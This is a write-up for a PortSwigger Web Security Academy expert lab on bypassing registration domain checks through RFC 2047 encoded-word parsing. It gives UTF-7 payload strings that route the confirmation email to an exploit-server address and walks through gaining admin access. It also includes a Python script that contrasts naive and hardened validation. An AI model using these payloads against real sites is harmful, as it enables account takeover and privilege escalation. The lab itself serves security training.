portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups. Detailed, categorized solutions for every lab — from APPRENTICE to EXPERT — covering all 30 vulnerability types.

Labs Covered

This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy:

12 Bypassing access controls using email address parsing discrepancies

This lab demonstrates how discrepancies in email address parsing between different components of an application can be exploited to bypass access controls.

LAB 12 - Bypassing access controls using email address parsing discrepancies

Lab Description: provided as a screenshot in the original writeup.

Solution:

Identify the registration restriction:

Notice that the application blocks the request and displays an error message stating that the email domain must be ginandjuice.shop. This indicates that the server enforces a domain check during registration.

Investigate encoding discrepancies:

Try to register an account with the following email, which is abcfoo@ginandjuice.shop with the abc portion encoded using Q encoding (Q encoding is part of the “encoded-word” standard): =?iso-8859-1?q?=61=62=63?=foo@ginandjuice.shop

Notice that the registration is blocked with the error: “Registration blocked for security reasons.”

Try to register an account with the following UTF-8 encoded email: =?utf-8?q?=61=62=63?=foo@ginandjuice.shop

Try to register an account with the following UTF-7 encoded email: =?utf-7?q?&AGEAYgBj-?=foo@ginandjuice.shop

Registration succeeds with UTF-7 encoding:

Notice that this attempt doesn’t trigger an error. This suggests that the server doesn’t recognize UTF-7 encoding as a security threat. Because UTF-7 encoding appears to bypass the server’s validation, you may be able to use it to craft an attack that tricks the server into sending a confirmation email to your exploit server email address while appearing to still satisfy the ginandjuice.shop domain requirement.

Exploit the vulnerability using UTF-7:

Payload: =?utf-7?q?hanzala&AEA-exploit-0ac00054036ef89280a82557012f00a4.exploit-server.net&ACA-?=@ginandjuice.shop

Decoding the components:

  1. UTF-7 encoding: the &AEA- and &ACA- sequences encode special characters; here they decode to @ and a space respectively.
  2. Decoded email: decoding the whole string gives `attacker@[YOUR-EXPLOIT-SERVER-ID] @ginandjuice.shop` (the payload above uses hanzala as the local part in place of attacker).

Click Email client. Notice that you have been sent a registration validation email. This is because the encoded email address has passed validation due to the @ginandjuice.shop portion at the end, but the email server has interpreted the registration email as attacker@[YOUR-EXPLOIT-SERVER-ID].
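To make the parsing discrepancy concrete, here is an added Python example (not part of the original writeup or of the lab itself): it expands RFC 2047 encoded-words the way a lenient mail component would, including the &...- modified UTF-7 shift the payload uses, and contrasts a suffix check that models the registration validation described above with a hardened check that refuses encoded input. The exploit-server ID in the sample payload is a constructed placeholder.

```python
import base64
import re

ALLOWED_DOMAIN = "ginandjuice.shop"
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([qQbB])\?([^?]*)\?=")  # RFC 2047: =?charset?encoding?text?=

def decode_utf7(text: str) -> str:
    # RFC 2152 UTF-7 shifts into base64 UTF-16BE with '+...-'; the IMAP modified
    # variant the lab payload uses shifts with '&...-' and writes ',' for '/'.
    def unshift(m):
        block = m.group(2).replace(",", "/")
        if not block:  # "+-" / "&-" stands for a literal shift character
            return m.group(1)
        raw = base64.b64decode(block + "=" * (-len(block) % 4))  # restore padding
        return raw.decode("utf-16-be", errors="replace")
    return re.sub(r"([+&])([A-Za-z0-9+/,]*)-?", unshift, text)

def decode_encoded_words(address: str) -> str:
    # Expand every encoded-word the way a lenient mail component would.
    def expand(m):
        charset, enc, text = m.group(1).lower(), m.group(2).lower(), m.group(3)
        if enc == "q":  # Q encoding: '_' means space, '=XX' is one hex byte
            text = re.sub(r"=([0-9A-Fa-f]{2})", lambda h: chr(int(h.group(1), 16)),
                          text.replace("_", " "))
            raw = text.encode("latin-1")
        else:           # B encoding: plain base64
            raw = base64.b64decode(text + "=" * (-len(text) % 4))
        return decode_utf7(raw.decode("ascii")) if charset == "utf-7" else raw.decode(charset)
    return ENCODED_WORD.sub(expand, address)

def naive_domain_check(address: str) -> bool:
    # Models the registration check the writeup describes: trust the literal suffix.
    return address.lower().endswith("@" + ALLOWED_DOMAIN)

def hardened_domain_check(address: str) -> bool:
    # Refuse anything whose meaning changes on decoding, then validate the plain form.
    try:
        decoded = decode_encoded_words(address)
    except (UnicodeError, LookupError, ValueError):
        return False
    if decoded != address or any(ch.isspace() for ch in decoded):
        return False
    local, sep, domain = decoded.rpartition("@")
    return sep == "@" and bool(local) and "@" not in local and domain.lower() == ALLOWED_DOMAIN

if __name__ == "__main__":
    # Constructed sample; EXAMPLE-ID stands in for a real exploit-server ID.
    payload = "=?utf-7?q?attacker&AEA-exploit-EXAMPLE-ID.exploit-server.net&ACA-?=@ginandjuice.shop"
    print("mail component sees:", repr(decode_encoded_words(payload)))
    print("naive:", naive_domain_check(payload), "hardened:", hardened_domain_check(payload))
```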

Click the confirmation link to activate the account.

Log in after the successful registration.

Gain admin access:

  1. Click My account and log in using the details you registered.
  2. Click Admin panel to access the list of users.

Delete the carlos user to solve the lab.